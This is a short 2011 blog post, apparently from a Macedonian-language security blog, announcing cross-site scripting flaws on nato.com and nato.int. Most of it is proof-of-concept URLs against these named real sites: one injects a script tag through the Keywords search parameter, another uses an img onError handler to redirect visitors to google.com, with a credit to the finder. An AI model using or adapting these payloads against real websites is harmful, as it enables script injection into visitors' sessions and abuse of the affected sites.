Nato.com & Nato.int are vulnerable to xss cross site scripting.
POC:
http://www.nato.com/result.php?Keywords=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E&r=c%253EcnG1cz6kc31%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CNL%253C7%253C2%253C2%253C55421545%253Ctuzmf2%25607%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25607%2560e3s%2560efsq%253Cwbsbl%253Cwbsbl%253C26878%253C3%253A451%253Cbtl%253C%2527jqvb%2560je%253E6g9bbd74g79b1g6426431e467499%253Agd7&Submit=Go
Url redirection (Google)
http://www.nato.com/result.php?Keywords=%3Cimg%20src=%22%22%20onError=%22document.location='http://google.com'%22%3E
Nato.int
http://www.nato.int/cps/en/natolive/search.htm
Found by: darknessn1k0!a
Saturday, February 12, 2011
nato.com & nato.int XSS vulnerable
0
About Me
- За Zer0-0ne
- Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4
0 comments:
Post a Comment